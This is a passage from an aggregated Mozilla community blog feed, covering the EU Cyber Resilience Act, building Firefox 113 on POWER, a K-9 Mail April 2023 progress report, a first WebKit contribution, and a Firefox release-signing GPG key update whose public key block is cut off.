Clear, proportionate, and enforceable rules are the way forward to achieve cyber resilience of digital products and, eventually, safety for all Internet users. We look forward to working closely with policymakers to realize these goals.

To read Mozilla’s position in detail, click here.

The post Mozilla weighs in on the EU Cyber Resilience Act appeared first on Open Policy & Advocacy.

The Talospace ProjectFirefox 113 on POWER

Yes, I skipped a version, sosumi. I'm running a little low on development space on the NVMe drive, but still managed to squeeze in Firefox 113 which introduces enhanced video Picture-in-Picture, more secure private windows and password generation, support for AVIS images, debugger improvements and additional CSS and API features. As usual you'll need to deal with bug 1775202 either with this patch — but without the line containing desktop_capture/desktop_capture_gn, since that's long gone — or put --disable-webrtc in your .mozconfig if you don't need WebRTC. The browser otherwise builds and works with the PGO-LTO patch for Firefox 110 and the .mozconfigs from Firefox 105.

Mozilla ThunderbirdThunderbird for Android / K-9 Mail: April Progress Report

Thunderbird for Android and K-9 Mail, April 2023 progress report

We’re back with another progress report as we continue improving K-9 Mail for its transformation to Thunderbird for Android! We spent most of the previous month preparing for a new stable release. In April 2023, we finally published K-9 Mail 6.600.

(By the way, if you missed the exciting news last summer, K-9 Mail is now part of the Thunderbird family, and we’re working steadily on transforming it into Thunderbird for Android. If you want to learn more, check out our Android roadmap, this blog post, and this FAQ.)

K-9 Mail 6.600

Along with a couple of new features, a lot of changes and bug fixes went into the new K-9 Mail version. However, space for release notes in app stores is very limited. So we went with this list of changes:

  • Redesigned the message view screen; tap the message header containing sender/recipient names to see more details
  • Added a setting for three different message list densities: compact, default, relaxed
  • Added better support for right-to-left languages when composing messages
  • Search now also considers recipient addresses
  • Fixed a bug where notifications would sometimes reappear shortly after having been dismissed
  • IMAP: Fixed a bug where sometimes authentication errors were silently ignored
  • Various other small bug fixes and improvements

Missing home screen widgets

After learning that an old bug in Android had finally been fixed in 2021, we changed the app to disable home screen widgets by default and only enable them after the user had added at least one account to K-9 Mail.
Of course we limited this to Android versions that should include the fix. However, this didn’t quite work as intended and existing home screen widgets disappeared on some devices. So we reverted the change in K-9 Mail 6.601.

K-9 Mail 6.7xx

With the stable release out the door, it was time for a new series of beta releases to test early versions of features and fixes that should go into the next stable release.

Bug fixes

The first beta version (6.700) didn’t include any new features, but fixes quite a few bugs (mostly obscure crashes).

IMAP ID extension

The GitHub user wh201906 contributed code to add support for the IMAP ID extension (thank you). It is used by an email client to send information about itself to the IMAP server. In turn, the server responds with some information about itself (name, software version, etc).

Unfortunately, some email providers reject clients not using this extension, even though the specification explicitly states the extension must not be used for that purpose. To make K-9 Mail work with such email providers without users having to change a setting, we decided to enable this functionality by default. Also, because we want to align our default values with Thunderbird, and it’s enabled there by default.

The information sent to the server is limited to just the app name – “K-9 Mail”. If you wish, you can disable this feature under Settings → <Account> → Fetching mail → Incoming server → Send client ID.

Next: Improved account setup

The main goal for the next stable release is to improve the account setup experience. Many new users are struggling with setting up an account in K-9 Mail. That’s because K-9 Mail only supports automatic account setup for a handful of large email providers. For all other email providers users have to manually enter the email server settings. And this can be a very frustrating experience.

Ideally, users only have to provide their email address and the app will figure out the rest. We’ll be adding support for Thunderbird’s Autoconfig mechanism which aims to deliver just this user experience.

Hopefully, we’ll be able to ship a first version of this in a beta release in May.

Releases

In April 2023 we published the following stable releases:

… and the following beta versions:

If you want to help shape future versions of the app, become a beta tester and provide feedback on new features while they are still in development.

The post Thunderbird for Android / K-9 Mail: April Progress Report appeared first on The Thunderbird Blog.

Anne van KesterenContributing to WebKit

Over the last couple weeks I have looked at the WebKit code with the intent of fixing a few things in areas of the web platform I’m familiar with as a personal curiosity. The code had always appeared hackable to me, but I had never given it a go in practice. In fact, this is the first time I have written C++ in my life! Marcos had given me a quick guide to set up my environment and I was off to the races.

It has been a lot of fun trying to get things to compile and making tests pass. And also have the chance to study how things are implemented in more detail. I wish web standards had some of the checks available in C++. Now I am well aware that C++ does not have the best reputation, but English is even more error-prone. Granted, the level of abstraction English sits at can also make things easier.

I can heartily recommend this to anyone who has been interested in doing this, but didn’t because it seemed too intimidating. Mind that the first contribution is a bit of a hurdle and can be humbling. Definitely was for me! I recommend tackling something that seems doable, but as with a lot of things it appears to get easier over time.

Mozilla Security BlogUpdated GPG key for signing Firefox Releases

The GPG key used to sign the Firefox release manifests is expiring soon, and so we’re going to be switching over to new key shortly.

The new GPG subkey’s fingerprint is ADD7 0794 7970 0DCA DFDD 5337 E36D 3B13 F3D9 3274, and it expires 2025-05-04.

The public key can be fetched from KEY files from the latest Firefox Nightly, keys.openpgp.org, or from below. This can be used to validate existing releases signed with the current key, or future releases signed with the new key.

-----BEGIN PGP PUBLIC KEY BLOCK-----

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
